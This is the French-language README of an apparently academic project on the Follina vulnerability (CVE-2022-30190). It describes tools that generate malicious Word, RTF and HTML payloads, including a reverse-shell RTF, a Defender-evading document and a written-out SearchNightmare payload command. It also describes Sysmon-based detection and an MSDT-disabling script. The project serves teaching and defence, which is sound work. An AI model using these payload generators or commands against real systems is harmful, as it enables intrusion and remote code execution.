Un projet de cybersécurité de Fullstack Academy examinant le cycle complet de la vulnérabilité Follina (CVE-2022-30190), de l'exploitation à la détection et à la défense.
Un projet de cybersécurité de Fullstack Academy examinant le cycle complet de la vulnérabilité Follina (CVE-2022-30190), de l'exploitation à la détection et à la défense.
Équipe :
Cet ensemble d'outils suppose que vous disposez d'un hébergeur web ou que vous pouvez lancer un simple serveur web en utilisant Python pour héberger les fichiers de charge utile générés ou d'exemple.
Les fichiers dans le dossier Exemples de charges utiles contiennent du code véritablement malveillant. Ils ont été utilisés avec des machines virtuelles sur un réseau local et ne devraient poser aucun problème sur un réseau sécurisé où vous faites confiance à toutes les machines, mais soyez prudent lors de l'utilisation ou de la modification de ces fichiers. De plus, les générateurs de documents et de charges utiles créent évidemment leurs propres fichiers malveillants. Veuillez utiliser ces outils uniquement sur des machines virtuelles ou d'autres environnements jetables ! N'utilisez aucun outil ici que vous ne comprenez pas.
Pour créer le document Microsoft Word avec l'exploit Follina, exécutez docgen_v3.py, en utilisant les options suivantes :
--extention/-e : change l'extension du document de .doc (par défaut) en rtf pour une attaque sans clic. Utilisation : -e rtf--ip_address/-ip : change l'adresse IP que le document tentera d'atteindre (par défaut 10.0.2.15).--port/-p : change le port qu'il tentera d'atteindre (par défaut 8000).Pour créer un fichier HTML de charge utile, utilisez generate_payload.py avec la sous-commande poc pour générer une preuve de concept qui ouvre la Calculatrice Windows, ou la sous-commande custom pour générer une charge utile avec votre propre script.
Exemples :
python generate_payload.py poc -o test.html générera la charge utile de la calculatrice dans test.htmlpython generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" générera test.html comme charge utile personnalisée avec l'exploit SearchNightmareDes exemples de charges utiles peuvent être trouvés dans le dossier "Exemples de charges utiles".
La détection de Follina nécessite que Sysmon soit installé pour enregistrer les événements. Nos méthodes de détection ici reposent sur la recherche d'instances où Microsoft Word appelle MSDT.exe, mais les scripts peuvent être modifiés pour rechercher d'autres artefacts comme les arguments utilisés par Follina dans sa commande PowerShell. Les outils suivants sont disponibles :
msdt_exp-del-v3.ps1 effectue une recherche similaire et, s'il détecte des signes de Follina, sauvegarde la clé de registre MSDT et désactive MSDT en supprimant la clé.Tous les fichiers docx, rtf et html d'exemple pointent vers des charges utiles hébergées à l'adresse IP 10.0.2.15. De plus, si vous souhaitez utiliser l'exploit de shell inverse, configurez un écouteur sur le port 9999.
Click Me!.docx fera un Rick Roll à l'utilisateurNo Click Exploit.rtf ouvrira un shell inverseI'm Too Sneaky For Defender.docx fonctionnera même si la protection en temps réel de Windows Defender est activée et exécutera une attaque SearchNightmare, ouvrant une recherche pour Procmon